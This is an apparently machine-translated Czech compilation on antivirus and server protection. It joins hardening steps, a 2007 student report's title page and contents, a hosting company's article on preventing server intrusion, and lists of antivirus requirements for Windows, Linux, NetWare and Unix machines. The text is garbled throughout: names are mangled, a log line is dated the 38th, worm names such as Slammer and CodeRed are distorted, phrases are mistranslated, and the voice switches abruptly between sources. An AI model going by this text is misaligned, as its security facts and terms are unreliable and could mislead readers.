Správci systému obvykle zastaví při 1 kroku, horší, nepřinesou jej do konce buď ne následovat aktualizace a dříve nebo později infekce se stále děje. Níže uvádí další důležité kroky k posílení antivirové ochrany.

2 krok. Politika hesla. Viry (trojnské) jsou schopny infikovat počítače v síti. Výběr hesel na standardní účty: root, admin, správce, správce. Vždy používejte složitá hesla! Pro účty bez hesel nebo jednoduchými hesly musí být správce systému vypálen s příslušným záznamem v záznamu zaměstnanosti. Po 10 pokusech o nesprávný zadání hesla musí být účet zablokován po dobu 5 minut na ochranu před brut-force (výběr heslem jednoduchým generováním). Vložené účty správce jsou extrémně výhodně přejmenovány a blokovány. Je třeba měnit periodicky hesla.

3 Krok. Omezení uživatelských práv. Virus (trojský) platí v rámci sítě jménem uživatele, který ho spustil. Pokud má uživatelská práva omezena: není přístup k jiným počítačům, neexistuje žádná správní práva k počítači, pak i spuštěný virus nemůže nakazit nic. Často jsou případy, kdy správci systému se stávají pachateli šíření viru: spustí admin klíč-gen a šli virus infikovat všechny počítače v síti ...

4 Krok. Pravidelná instalace aktualizací zabezpečení. To je obtížná práce, ale je nutné to udělat. Musíte aktualizovat nejen OS, ale také všechny aplikace: DBMS, e-mailové servery.

5 krok. Omezit cesty pronikání virů. Viry Zadejte místní síť podniku dvěma způsoby: prostřednictvím zaměnitelných médií a dalších sítí (Internet). Zakázání přístupu k USB, CD-DVD, zcela překrývají 1 cestu. Omezení přístupu k internetu se překrývají 2 způsoby. Tato metoda je velmi účinná, ale těžko implementujeme.

6 Krok. Firewalls (ITU), jsou brány firewall, jsou to Brandmaera. Musí být instalovány na hranicích sítě. Pokud je počítač připojen k Internetu přímo, musí být zahrnuta ITU. Pokud je počítač připojen pouze k místní síti (LAN) a přejde do internetu a dalších sítí prostřednictvím serverů, pak na tomto počítači ITU je volitelný.

7 krok. Separace sítě podniku na podsíti. Síť je vhodná prolomit princip: jedno oddělení v jedné podsíti, další oddělení - do druhé. Na podsítě lze rozdělit na fyzickou úroveň (SCS), na úrovni kanálu (VLAN), na úrovni sítě (neprokázaná IP adresy podsítí).

8 krok. Ve Windows je skvělý nástroj pro správu bezpečnosti velkých skupin počítačů - jedná se o skupinové politiky (GPO). Můžete konfigurovat počítače a servery prostřednictvím GPOS tak, aby infekce a šíření malware budou téměř nemožné.

9 Krok. Přístup k terminálům. Zvedněte 1-2 terminálové servery v síti, přes které uživatelé půjdou na internet a pravděpodobnost infekce jejich osobních počítačů klesne na nulu.

10 krok. Sledování všech procesů a služeb běžících v počítačích a serverech. To lze provést tak, aby při spuštění neznámého procesu (služba) přichází správce systému. Komerční software, který může udělat, je to velmi hodně, ale v některých případech jsou náklady odůvodněné.

CHITA Státní univerzita Energetický institut Ekonomics a infofedra Aplikovaná informatika a matematika Refemerto Předmět: PCNA Téma: Anti-virus software pro servery provedené: Art. C. PI-07-1ZLOVA V.V. VSERLA: Umění. přípravka. kavárna. Pymmonální i.p. Chita, 2007. Obsah

Úvod 3.

1 Souborové servery jako jeden ze zdrojů distribuce virů. Pět

2 antivirový software pro místní síťové servery. Pět

3 antivirový software pro poštovní servery. osm

4 Kaspersky Anti-Virus. jedenáct

Závěr. 17.

Seznam referencí .. 18

Úvod Jednou z nejnebezpečnějších hrozeb bezpečnosti informací jsou počítačovými viry. Počítačový virus je speciálně psaný program, který je schopen spontánně připojit k jiným programům, vytvoří jejich kopie a implementovat je do souborů, oblastí počítačového systému a v počítačových počítačích, aby se porušilo programy, soubory poškození a adresáře, vytvářet všechny druhy rušení počítač.

Informační zabezpečení se týká bezpečnosti informací a jeho podpůrné infrastruktury z jakýchkoli náhodných nebo škodlivých dopadů, jejichž výsledek může být poškození informací samotných, jeho vlastníků nebo podpůrné infrastruktury. Úkoly zabezpečení informací se sníží na minimalizaci poškození, jakož i prognózování a prevence těchto dopadů.

Pro většinu organizací se ochrana síťových prostředků z neoprávněného přístupu stává jednou z nejmocnějších problémů. Zvláštního alarmu je skutečnost, že internet je v současné době používán všude pro přepravu a ukládání různých datových a důvěrných firemních informací.

Úkolem ochrany informací je zvláště relevantní pro majitele online informačních databází, vydavatelů elektronických časopisů atd.

K dnešnímu dni bylo vytvořeno mnoho antivirových programů pro boj proti virům. Sada antivirových programů. AvaVivary program (antivirus) je zpočátku program pro odhalování a zpracování programů infikovaných počítačovým virem, stejně jako zabránit infekci souborů s virem ( Například s očkováním). Mnoho moderních antivirů vám umožní detekovat a odstranit trojské programy a další škodlivé programy. Anti-Virus Software se skládá z počítačových programů, které se snaží detekovat, zabránit reprodukci a odstranění počítačových virů a jiného malwaru. AvaViviral Software pomáhá chránit počítač před známými viry, "červi", "trojsky" a další škodlivé programy, z nichž V počítači může dojít k poruše. Aktuálně, soubory a e-mailové servery jsou hlavním nástrojem pro správu dat. Úložiště, výměna a přenos dat jsou hlavními úkoly v takovém řízení, ale nejsou možné bez snadného přístupu k informacím, integraci dat a stabilitu systému. Souborový server je jedním z nejzranitelnějších síťových prostředků. Při infikování nebo neúspěchu může být přístup k jiným síťovým prostředkům omezen. Jeden infikovaný soubor může vést k velkému datovému pole, ztrátám integrace dat a selhání systému. Tato rizika způsobují vysoké náklady na produkty pro správu serverů a síťových prostředků. Souborové servery "Obecné použití" a elektronické konference slouží jako jeden z hlavních zdrojů šíření viru. Téměř každý týden přichází zpráva, že každý uživatel infikoval svůj počítač s virem, který byl odstraněn z BBS, FTP serveru nebo z jakékoli elektronické konference. Současně, často infikované soubory jsou "položeny" autorem viru do několika Bbs / FTP nebo jsou zároveň odeslány přes více konferencí, tyto soubory jsou maskovány pro nové verze jakéhokoli softwaru (někdy pod novými verzemi antivirusy). V případě hromadné distribuce viru na FTP / BBS souborů, tisíce počítačů postižených téměř současně, ale ve většině případů "Dos nebo Windows viry jsou položeny, jejichž distribuční rychlost v moderních podmínkách je výrazně nižší než makro viry. Z tohoto důvodu takové incidenty téměř nikdy nekončí s masovými epidemiemi, které nelze říci o makro virech. 2 antivirový software pro servery místních sítí Efektivní otázky antivirové ochrany dnes jsou důležité jak v oblasti korporátního sektoru, tak mezi soukromými uživateli, nicméně, na rozdíl od posledněných problémů a úkolů, které vstávají do firem mnohem vážněji a vyžadují další úroveň řešení. Správci firemních informačních systémů musí nainstalovat antivirové nástroje, konfigurovat je a přizpůsobit aktualizační politiky, stejně jako aby se zajistily, že antivirony jsou neustále zahrnuty na stovky nebo dokonce tisíce automobilů a často to dělají všechno ručně. Místní sítě jsou jedním z hlavních zdrojů distribuce virů. Pokud neuděláte nezbytná ochranná opatření, pak infikovanou pracovní stanici při vstupu do sítě infikuje jeden nebo více souborů služeb na serveru (v případě Novell NetWare - LogIn.com). Další den, uživatelé spustí infikované soubory při vstupu do sítě. Namísto servisního souboru Login.com, různé software nainstalované na serveru, standardní šablony nebo tabulky Excel použitelné ve firmě může také provádět různé software.

Nebezpečí infekce výpočetních sítí je skutečné pro jakýkoli podnik, ale skutečný vývoj virové epidemie lze získat v místních sítích velkých ekonomických a výrobních komplexů s teritoriální zábavou infrastrukturou. Jejich výpočetní sítě jsou obvykle vytvářeny postupně, pomocí různých hardwaru a softwaru. Zřejmě pro takové podniky se problematika antivirové ochrany stává velmi obtížnou, a to nejen v technickém, ale také finančně.

Řešením této problematiky je zároveň dosaženo kombinací organizačních opatření a softwarových a technických řešení. Tento přístup nevyžaduje velké technické a bezprostřední finanční náklady a lze jej uplatnit na integrovanou antivirovou ochranu místní sítě jakéhokoli podniku.

Základem konstrukce takového systému antivirové ochrany lze položit následující principy:

Zásada provádění jedné technické politiky při odůvodnění volby antivirových produktů pro různé segmenty místní sítě;

Princip úplnosti pokrytí systému antivirového ochrany celé místní organizace;

Princip kontinuity řízení lokální sítě podniku, pro včasnou detekci počítačové infekce;

Princip centralizovaného řízení antivirové ochrany;

Zásada provádění jedné technické politiky stanoví použití pouze antivirového softwaru ve všech segmentech místní sítě, doporučené jednotkou Enterprise Anti-Virus. Tato politika je dlouhodobá, schválená vedením podniku a je základem pro cílené a dlouhodobé náklady na plánování pro nákup antivirových softwarových produktů a jejich další aktualizace.

Princip úplného pokrytí systému ochrany proti viru sítě poskytuje postupný zavádění antivirového softwaru pro ochranu proti viru sítě k plné saturace v kombinaci s organizačními a režimovými opatřeními ochrany informací.

Princip kontinuity kontroly nad antivirovým stavem lokální sítě zahrnuje takovou organizaci své ochrany, ve které je zajištěna neustálá možnost sledování stavu sítě k identifikaci virů.

Princip centralizovaného řízení antivirové ochrany zajišťuje správu systému z jednoho těla pomocí technického a softwaru. Je to toto tělo, které organizuje centralizovanou kontrolu sítě, přijímá kontrolu dat nebo zprávy uživatelů z jejich práce na detekci virů a zajišťuje zavedení rozhodnutí o řízení antivirového systému ochrany. AvaVivovary ochrany místní sítě velké organizace je Komplexní problém, který se nevaří do jednoduché instalace antivirových produktů. Zpravidla je vyžadováno vytvoření samostatného subsystému. V technickém plánu, při řešení tohoto problému, zvláštní pozornost by měla být věnována testování celého nově získaného antivirového softwaru, jakož i instalaci antivirových balíčků na poštovní servery. 3 antivirový software pro poštovní servery

Je-li na úsvitu vývoje výpočetní techniky, hlavní kanál kanálů virů šíření byla výměna programových souborů prostřednictvím disketových disků, pak dnes Palm Mistrovství patří e-mailu. E-mail - pohodlné a nepostradatelné prostředky obchodní komunikace. Nicméně, e-mailem, většina virů a spamu je distribuována, může to být kanál pro úniku důvěrných dat. Každý den jsou přes své kanály přenášeny miliony a miliony zpráv a mnoho z těchto zpráv jsou infikovány viry.

Investiční soubory přenášené e-maily bohužel mohou být také nesmírně nebezpečné pro zdravotnické zdraví. Jaké je nebezpečí investičních souborů? Jako takový soubor může uživatel odeslat virový nebo trojský program nebo dokument ve formátu Microsoft Office (* .doc, * .xls) infikovaný počítačovým virem. Spuštění přijatého programu Chcete-li provést nebo otevřít dokument, který chcete zobrazit, může uživatel zahájit virus nebo nainstalovat program Trojan na svém počítači. Kromě toho, v důsledku nesprávných nastavení pošty nebo chyby, které jsou k dispozici v něm, mohou být přílohy otevřeny automaticky při zobrazení obsahu obdržených písmen. V tomto případě, pokud neberete žádná ochranná opatření, záleží na penetraci virů nebo jiných škodlivých programů na vašem počítači. Můžete a další pokusy proniknout do počítače prostřednictvím e-mailu. Například můžete poslat zprávu jako dokument HTML, který je postaven v řídicím systému Trojan ActiveX. Otevření této zprávy si můžete stáhnout tuto položku do počítače, po kterém bude okamžitě začít svou práci. E-mail Trojan - Trojáci, které vám umožní "vytáhnout" hesla a další informace z počítače souborů a odeslat je e-mailem hostitele. To může být přihlášení a hesla internetu, heslo z poštovní schránky, ICQ hesla a IRC a další kontakty odešlete dopis poštou poštou, TROYAN je spojen s E-mailovým serverem SMTP (například na SMTP.Mail.ru). Po sběru potřebných údajů bude TOYAN zkontrolovat, zda tyto údaje byly odeslány. Pokud ne, data jsou odeslána a uložena v registru. Pokud jste byli odesláni, předchozí písmeno je extrahováno z Regis a je porovnán s aktuálním. Pokud došlo k některým změnám v informacích (objevila se nová data), pak je odeslán písmeno a zaregistrujte se čerstvé údaje o heslech. Ve slově, tento typ Trojanova jednoduše zapojil do sbírání informací a oběti nemusí ani hádat, že její hesla jsou s někým známa. V archivu takového troja, 4 soubory se obvykle umístí: server editor (konfigurátor), Trojský server, Packer (Shleshchik) soubory, manuál pro použití. Následující data mohou být definována: 1) IP adresa oběti počítače; 2) Podrobné informace o systému (název počítače a uživatele, verze Windows, modemu atd. .), 3) Všechna hesla v mezipaměti 4) Všechna nastavení telefonních spojení včetně telefonních čísel, přihlášení a hesel; 5) Hesla z ICQ; 6) Počet nedávných nalezených stránek. Kromě čistě administrativních opatření, bojovat proti virům a dalším škodlivým programům, je nutné použít speciální antivirový software (antivirusy). Pro ochranu virů šíření e-mailem, antivirusy mohou být instalovány na počítačích odesílatele a příjemců . Taková ochrana však často nestačí. Konvenční antivirony instalované na uživatelích Internetu jsou navrženy tak, aby zkontrolovaly soubory a ne vždy vědět, jak analyzovat datový proud e-mailu. Pokud antivirový program automaticky nezkontroluje všechny soubory otevřené, může virus nebo trojský program snadno unikat ochranou počítače disk. Kromě toho je účinnost antivirů velmi závislé na souladu s pravidly jejich aplikace: to je nezbytné k pravidelné aktualizaci anti-virové databáze, použijte správné nastavení antivirového skeneru atd. Bohužel, mnoho vlastníků počítačů neví, jak používat antivirony správně nebo neaktualizovat antivirovou databázi, která nevyhnutelně vede k virové infekci. Po relevanci problému šíření virů e-mailem, mnoho společností nabízejí speciální antivirusové programy Chránit poštovní servery. Takové antivirony analyzují tok dat procházející poštovním serverem, neumožňují zprávy o zasílání zpráv s infikovanými soubory příloh. Existuje další řešení - připojení k poštovním serverům konvenčních antivirů určených k ověření souborů. Autivapivní ochrana poštovních serverů SMTP a POP3 je mnohem efektivnější než antivirová ochrana uživatelských počítačů. Ze pravidlo, že zkušený správce je zapojen do konfigurace antivirubů na serveru, který není při nastavování a také zapne režim automatické aktualizace databáze přes internet. Uživatelé chráněných SMTP a POP3 serverů se nemusí starat o distribuční kanál hlavního kanálu - obdrží zprávy již vyčištěné z virů. Zařízení prováděné poštovními servery při odesílání a získávání infikovaných písmen závisí na konfiguraci antivirového a samotného poštovního serveru. Například, když se odesílatel pokusí odeslat zprávu s infikovaným souborem, poštovní server SMTP jej odmítne v tomto, a poštovní program zobrazí upozornění na obrazovce. Pokud někdo pošlete e-mail na adresu s Infikovaný přílový soubor, pak namísto používání zabezpečeného serveru POP3 obdrží pouze zprávu o objevu viru. I přes stále rostoucí popularitu platformy Microsoft Windows, dnes většina internetových serverů provozuje operační systémy Linux, FreeBSD a podobné systémy podobné Unixu. Hlavní výhodou Linuxu je velmi nízké náklady na akvizici. Každý si může stáhnout distribuční síť Linuxu přes internet a nainstalovat ji na libovolný počet počítačů. Tato distribuce má vše, co potřebujete vytvořit internetový uzel, včetně e-mailových serverů. V dalších výhodách Linuxu a podobného OS by mělo být poznamenáno otevřenost, dostupnost zdrojových textů, dostupnost obrovské komunity dobrovolných vývojářů, připravená Pomoc v obtížných situacích, jednoduché dálkové ovládání pomocí textové konzoly atd. Pro sérii této série bylo vytvořeno jen několik desítek virů, což naznačuje jeho vysokou bezpečnost.

4 Kaspersky Anti-Virus

Není možné chránit server z externího přístupu jednou a pro všechny, protože každý den jsou zjištěny nové chyby zabezpečení a zobrazí se nové způsoby hackingového serveru. Řekneme vám o ochraně serverů z neoprávněného přístupu v tomto článku.

Každá firemní servery dříve nebo později se může stát cílem pro hacking nebo virový útok. Výsledek takového útoku se obvykle stává ztrátou dat, reputačních nebo finančních škod, takže bezpečnost zabezpečení serveru stojí za to věnovat pozornost na prvním místě.

Mělo by být zřejmé, že ochrana proti serverům hacking je soubor opatření, včetně neustálého monitorování serveru a práce na zlepšování ochrany. Není možné chránit server z externího přístupu jednou a pro všechny, protože každý den jsou zjištěny nové chyby zabezpečení a zobrazí se nové způsoby hackingového serveru.

Řekneme vám o ochraně serverů z neoprávněného přístupu v tomto článku.

Metody a metody pro ochranu serverů před neoprávněným přístupem

Server pro fyzický ochranu

Fyzická ochrana. Je žádoucí, aby server byl v chráněném datovém centru, uzavřené a hlídané místnosti, cizí by neměl být přístup k serveru.

Nastavit ověřování SSH.

Při konfiguraci přístupu serveru použijte ověření kláves SSH namísto hesla, protože tyto klíče jsou mnohem složitější, a někdy je prostě nemožné hackovat s pomocí provedení.

Pokud si myslíte, že stále potřebujete heslo, nezapomeňte omezit počet pokusů o zadání.

Při zadávání zadáte následující zprávu, pokud zadáte následující zprávu:

Poslední neúspěšné přihlášení: Út se 38 12:42:35 MSK 2017 od 52.15.194.10 na SSH: Neznáma
Tam bylo 8243 neúspěšné pokusy o přihlášení od posledního úspěšného přihlášení.

To může znamenat, že váš server se pokusil hackovat. V tomto případě můžete konfigurovat zabezpečení serveru, změnit port SSH, omezit seznam IP, ze kterého je přístup k serveru možné nebo nastavit software automaticky blokování nadměrně časté a podezřelé aktivity.

Pravidelně nainstalujte nejnovější aktualizace

Chcete-li zajistit ochranu serveru, včas nastavit nejnovější aktualizace softwaru a serveru, které používají operační systém, hypervisor, databázové servery.

Doporučuje se zkontrolovat dostupnost nových oprav, aktualizací a zpráv o chybách / chyby / chyby zabezpečení, aby se zabránilo útokům pomocí zranitelností nulových dnů. Chcete-li to udělat, přihlaste se ke zprávám ze společnosti Development Software, postupujte podle svých stránek v sociálních sítích.

Chránit hesla

Doposud jeden z jejich nejběžnějších způsobů přístupu k serveru je heslo přerušení serveru. Proto dodržujte dobře známé, ale relevantní doporučení, aby nebyla opustit server bez ochrany:

  • nepoužívejte hesla, která se snadno zvedne, například název společnosti;
  • pokud stále používáte výchozí heslo pro konzolu správce - okamžitě ji změňte;
  • hesla pro různé služby by měly být odlišné;
  • pokud potřebujete projít heslo pro každého, nikdy neposlat adresu IP, přihlášení a heslo ve stejném písmenu nebo zprávě v Messengeru;
  • můžete nastavit dvoustupňové ověřování pro vstup do účtu správce.

Firewall

  • Ujistěte se, že je zde server, je nakonfigurován a funguje po celou dobu.
  • Chránit a příchozí a odchozí provoz.
  • Dejte si pozor na jaké přístavy jsou otevřené a pro jaké účely neotevírejte nic nadbytečného, \u200b\u200babyste snížili počet pravděpodobných zranitelných sedadel pro hackování serveru.

Zejména brána firewall pomáhá chránit server před útoky DDOS, protože Můžete rychle vytvářet zakázání pravidel brány firewall a přinést adresy IP k nim, ze kterého přichází útok, nebo blokovat přístup ke konkrétním aplikacím podle konkrétních protokolů.

Monitorování a detekce narušení

  • Omezte software a služby, které pracujete na serveru. Pravidelně zkontrolujte vše, co máte spuštěn, a pokud jsou nalezeny některé neznámé procesy, okamžitě je odstraňte a začněte kontrolovat viry.
  • Pravidelně zkontrolujte přítomnost stopy hackingu. O hackingu může znamenat nové uživatelské účty, které jste soubor nevytvořili, nepohybovali nebo neodstranili /etc/syslog.conf.Smazané soubory / etc / stín a / etc / passwrd.
  • Sledujte svůj server, postupujte podle jeho obvyklé rychlosti a šířky pásma, abyste si mohli všimnout odchylky, například když je zátěž na serveru mnohem více než obvykle.

Použití šifrování VPN a SSL / TLS

Pokud je požadován vzdálený přístup k serveru, musí být povoleno pouze od konkrétních adres IP a vyskytne se VPN.

Další bezpečnostní fázi lze nastavit SSL, která umožní nejen šifrovat data, ale také zkontrolovat identitu ostatních účastníků síťové infrastruktury vydáním příslušných certifikátů jim.

Bezpečnostní kontrola serveru

Dobrý nápad bude nezávislá bezpečnostní kontrola serveru podle metody PENTEST, tj. Modelování útoku pro nalezení potenciálních zranitelností a likvidovat je včas. Doporučuje se přilákat profesionály zabezpečení informací, ale některé testy lze provádět nezávisle pomocí programů pro hackovací servery.

Co jiného ohrožuje servery kromě hackingu

Server může selhat pro řadu dalších důvodů kromě hackingu. Může být například malware infekce nebo jednoduše fyzikální rozbití jakékoli součásti.

Akce ochrany serveru proto by proto měly zahrnovat:

  • Instalace a aktualizace programů pro ochranu serveru - antivirusy.
  • Pravidelné šifrované kopie dat alespoň jednou týdně, protože podle statistik, pevných disků serveru na prvním místě ve frekvenci poruch. Ujistěte se, že záloha je uložena ve fyzicky bezpečném prostředí.
  • Zajištění nepřerušeného napájecího serveru.
  • Včasná fyzikální prevence serverů, která zahrnuje jejich čištění z prachu a vyměnit tepelnou pastu.

Zkušenosti s ingrájemi specialistů nám říkají, že nejlepší ochranou proti tomuto druhu hrozeb je využití osvědčených postupů v oblasti systémů ochrany serverů.

Aby byla zajištěna bezpečnost serverů našich zákazníků, aplikujeme kombinaci nástrojů: firewallů, antivirusů, technologií řízení bezpečnosti / událostí (SIM / SEM), technologie detekce narušení / ochrany (IDS / IP), technologie behaviorální sítě (NBA), Samozřejmě pravidelné servery preventivní údržby a uspořádání chráněného serveru na klíč. To vám umožní snížit rizika selhání hackování nebo serveru z jiných důvodů na minimum.

Připraven k provedení bezpečnostního auditu serverů společnosti, provádět konzultace specialistů, provést všechny typy práce na nastavení ochrany serverových zařízení.

Na základě výše uvedených úvah a příkladů je možné formulovat základní požadavky na antivirus pro pracovní stanice. Je zřejmé, že tyto požadavky budou odlišné pro pracovní stanice různých tříd.

Požadavky na antivirus pro pracovní stanice Windows

Stejně jako dříve budou požadavky rozděleny do několika kategorií:

  1. Obecné požadavky - spolehlivost, výkon, snadnost použití, nízké náklady - žádný smysl opět opakovat
  2. Primární požadavky - V důsledku hlavního úkolu:
    • Kontrola všech souborů na místních discích, ke kterým je odvolání číst, na vstupu, na spuštění - za účelem identifikace a neutralizace počítačových virů
    • Zkontrolujte vyměnitelné a síťové pohony
    • Kontrola paměti
    • Kontrola příchozích a odchozích písmen pro přítomnost virů, musí být zkontrolovány jak samotné zprávy a přílohy
    • Zkontrolujte skripty a další aktivní prvky webových stránek
    • Zkontrolujte makra v aplikacích Microsoft Office a dalších aplikačních souborů
    • Zkontrolujte kompozitní soubory - archivy, samorozbalovací archivy, balené spustitelné soubory, poštovní databáze, poštovní soubory, kontejnery OLE
    • Schopnost vybrat různé akce nad infikovanými soubory, pravidelné:
      • blokování (při kontrole v reálném čase)
      • protokolování (při kontrole na vyžádání)
      • odstranění
      • pohybující se na karanténě
      • léčba
      • Žádost o uživatele
    • Léčba infikovaných souborů
    • Léčba infikovaných souborů v archivech
    • Je žádoucí - detekce potenciálně nežádoucích programů (propagační a špionážní moduly, hackerové utility atd.)
  3. Požadavky na správu
    • Dostupnost místního grafického rozhraní
    • Možnost vzdálené a centralizované správy (firemní verze)
    • Schopnost plánovat zahájení úkolů kontroly a aktualizace
    • Schopnost zahájit všechny úkoly nebo provádět jakékoli akce na vyžádání (ručně)
    • Schopnost omezit činnosti neprůhledného uživatele ve vztahu k antivirovému komplexu
  4. Požadavky na aktualizaci
    • Podpora různých zdrojů aktualizace, pravidelné:
      • Zdroj http nebo ftp
      • Místní nebo síťová složka
      • Centralizovaný systém aktualizace (v podnikových verzích)
    • Schopnost aktualizovat antivirové základy, antivirové jádro a aplikační moduly
    • Schopnost provádět aktualizace ručně na vyžádání nebo automaticky na harmonogramu
    • Schopnost vrátit se zpět na aktualizaci antivirových základen
  5. Požadavky na diagnostiku
    • Oznámení místního uživatele o důležitých událostech - detekci virů, změna stavu antivirového, atd.
    • Udržování antivirových a / nebo jednotlivých úkolů
    • Oznámení správce zabezpečení proti viru (v podnikové verzi)
Požadavky na antivirus pro pracovní stanice Linux / Unix
  1. Obecné požadavky - Prakticky žádná změna: spolehlivost, produktivita, nízká cena. Snadné použití v systémech Unixu se tradičně odhaduje několika dalšími kritérii než v systému Windows-systémy, i když tento stav a začne se postupně měnit směrem k sjednocení požadavků
  2. Primární požadavky - Na základě cíle:
    • Zkontrolujte požadavek libovolných souborů a katalogů pro dostupnost virů
    • Je žádoucí, ale ne kritická - kontrola určitých adresářů v reálném čase při přístupu k souborům. Pokud je taková funkce skutečně nutná, znamená to, že to není tolik o pracovní stanici, kolik o serveru - neexistují žádné jasné rozdíly mezi nimi v systémech UNIX
    • Detekce virů v kompozitních objektech - archivy, samorozbalovací archivy, balené spustitelné moduly, databáze stanice, soubory pošty formátů, kontejnery OLE - nejsou omezeny na formáty běžné v prostředí UNIX
    • Schopnost vybrat akci při detekci infikovaných souborů pravidelně:
      • vymazat
      • přesunout nebo přejmenovat
      • zacházet
      • informace o záznamu ve zprávě
      • požádat o akci uživatele (při kontrole poptávky)
    • Léčba infikovaných souborů
    • Výhodně - možnost léčby v archivech
  3. Požadavky na správu
    • Místní ovládání pomocí konfiguračních souborů
    • S výhodou - dálkové ovládání přes webové rozhraní
    • Schopnost naplánovat spuštění úkolů a akce
    • Schopnost provádět úkoly a akce ručně
  4. Požadavky na diagnostiku
    • Udržování pracovních protokolů
    • Oznámení administrátora antivirového zabezpečení

Ochrana serveru

Obvykle antivirová obrana Servery nejsou tak odlišné od ochrany pracovních stanic, jako je ochrana bran. Hlavní hrozby a technologie opozice zůstávají stejné - pouze akcenty jsou posunuty.

Síťové servery, stejně jako pracovní stanice jsou přirozeně rozděleny do tříd, podle použitých operačních systémů:

  • Windows servery
  • Novell NetWare servery
  • Unix servery

Princip divize je způsoben virem hrozbami charakteristické pro různé operační systémy a v důsledku toho různé možnosti při určování hlavního úkolu antivirového.

V případě výrobků pro ochranu serverů, dělení osobních a síťových produktů - všechny produkty jsou síť (firemní). Mnoho výrobců nemá divizi firemních produktů, které jsou určeny pro pracovní stanice a souborové servery - existuje jeden produkt.

Specifické hrozby a metody protiústí

Všechny konkrétní hrozby související s nimi souvisí s funkcemi operačních systémů serveru jako používání zranitelného softwarového charakteristiky serverů.

Microsoft Windows Servers

Pro Windows Servery jsou relevantní všechny stejné hrozby jako pracovní stanice pod Windows NT / 2000 / XP. Rozdíly jsou pouze v preferenčním způsobu provozu serverů, který je vyjádřen v řadě dalších útoků, netypionistických pro pracovní stanice.

Uživatelé proto zřídka pracují přímo do práce, což znamená, že poštovní klienti a kancelářské aplikace na serverech se obvykle nepoužívají. Výsledkem je, že požadavky na ochranu pošty na úrovni poštovní klienta a další nástroje detekce macrumorus v případě serverů Windows jsou nižší.

Příklad. Kaspersky Anti-Virus pro systémové servery Windows na rozdíl od Kaspersky Anti-Virus pro Windows Workstations je zbaven modulu analýzy chování provedené makry provádí při práci s dokumenty sady Microsoft Office a ověřovacím modulem přijaté a odeslané pošty. To neznamená, že výrobek nemá ochranu proti makroviry a poštovními červi - jak již bylo uvedeno, v konečném důsledku, všechny soubory otevřené jsou kontrolovány modulem konstantního systému souborů - jednoduše specifika provozu serverů nevyžadují dodatečnou ochranu Nástroje, jak to bylo v případě pracovních stanic.

Na druhé straně, na serverech Windows, služby, jako je Microsoft SQL Server a Microsoft IIS lze použít na pracovních stanicích. Stejně jako samotné operační systémy společnosti Microsoft (a nejen Microsoft), tyto služby mohou obsahovat chyby zabezpečení než najednou opakovaně používají autoři virů.

Příklad. V roce 2003 se objevil a doslova zametl přes internet černý černý červ .Win32.slammer, který použil chybu zabezpečení společnosti Microsoft SQL Server 2000. Slammer neukládal své soubory na disk a byl proveden přímo v adresním prostoru serveru SQL Server . Poté, v nekonečném cyklu, červ pracoval útok na náhodné IP adresy v síti, snažil se použít stejnou chybu zabezpečení k proniknutí. V důsledku činnosti šneku byly serverové a komunikační kanály internetu ohromeny do té míry, že celé síťové segmenty nebyly k dispozici. Zvláště zraněno od epidemie Jižní Koreje. Je třeba poznamenat, že červa nesplnila žádné jiné akce.

Příklad. Dokonce ještě dříve, v roce 2001 byla chyba zabezpečení v aplikaci Microsoft IIS 5.0 použita k propagaci černého červu .win32 červ. Kódované .a. Účinky epidemie nebyly tak působivé jako v případě blammera červ, ale s pomocí počítačů infikovaných kodistrem .a byl proveden neúspěšný pokus o útok DDOS na místě amerického bílého domu (www.whitehouse .gov). Kódované .a také neukládala soubory na discích dotčených serverů.

Funkce obou červů je, že modul ověření systému souborů (alespoň na vyžádání, alespoň s přístupem) proti nim je bezmocný. Tyto červy neukládají své kopie na disk a neexistují žádným způsobem, aby jejich přítomnost v systému, s výjimkou výškové sítě. Dosud hlavní doporučení pro ochranu je včasná instalace oprav v operačním systému a používá software. Dalším přístupem je nakonfigurovat brány firewall tak, aby porty používané zranitelnými službami nejsou dostupné zvenčí - rozumný požadavek v případě ochrany proti Slammer, ale nepřijatelné pro ochranu před kodistrem.

Červi, útočníci již přímo zranitelné služby operačního systému, jako je Lovesan, Sasser, MyTob, atd., Taký, jako je Lovesan, Sasser, MyTob et al. Uvedené červi uložte soubory na pevném disku).

Vzhledem k povaze útoků můžeme dospět k závěru, že hlavní prostředky ochrany serverů Windows Server jsou: Kontrolní modul souborů při přístupu k modulu kontroly souboru na vyžádání, kontrolním modulu skriptu a hlavní technologie - podpis a heuristická analýza (stejně jako Behavioral - v modulu kontroly skriptu).

Novell NetWare servery

Neexistují žádné konkrétní viry, které mohou infikovat Novell NetWare. TRUE, existuje několik trojských koní, nesoucí přístupová práva k serverům Novell, ale jsou stále určeny pro provádění v prostředí systému Windows OS.

Antivirový program pro server Novell NetWare Server proto není určen k ochraně tohoto serveru. Co je tedy jeho funkce? Při prevenci šíření virů. Novell NetWare servery z větší části jsou používány jako servery souborů, počítače se systémem Windows mohou ukládat své soubory na takových serverech nebo spustit programy umístěné na svazcích Novell NetWare. Aby se zabránilo virům vstupovat do obecných zdrojů serveru Novell nebo spustit / čtení virů z těchto zdrojů a potřebují antivirové potřeby.

Pevná aktiva používaná v antivirovém pro Novell NetWare - kontrola při přístupu a kontrole poptávky.

Z specifických technologií používaných v antivirovém pro Novell NetWare je nutné označit blokování stanic a / nebo uživatelů, kteří zaznamenávají škodlivé programy na serveru.

Unix servery

Na serveru Unix můžete říci vše jako o serveru Novell NetWare. Anti-Virus pro Unix servery nespočívá tolik úkolu ochrany samotných serverů z infekce, kolik úkolu zabránit šíření virů přes server. Za tímto účelem se použijí všechny stejné dva hlavní fondy:

  • Zkontrolujte soubory na vyžádání
  • Zkontrolujte soubory při přístupu

Příklad. Kaspersky Anti-Virus pro soubory souborů UNIX / Linux se rozsvítí kontrolní modul při přístupu, zatímco v aplikaci Kaspersky Anti-Virus pro pracovní stanice Linux není žádný takový modul. To je způsobeno různými funkcemi pracovních stanic a serverů Linuxu - v síti postavené výhradně (nebo většinou) na stanice Linuxu je prakticky chybí nebezpečí infekce s viry, a proto není nutná modul, který řídí všechny operace souborů. Naopak, pokud je počítač Linux aktivně používán pro ukládání a přenos souborů (zejména v síti Windows), pak je to ve skutečnosti server a vyžaduje konstantní nástroje pro řízení souborů.

Mnoho slavných červů pod Linuxem slouží k distribuci zranitelnosti, která není v samotném operačním systému, ale v systémovém a aplikačním softwaru v serveru WU-FTPD FTP serveru v webovém serveru Apache. Je zřejmé, že takové aplikace jsou používány častěji na serverech než na pracovních stanicích, což je další argument ve prospěch rozšířených opatření na ochranu serverů.

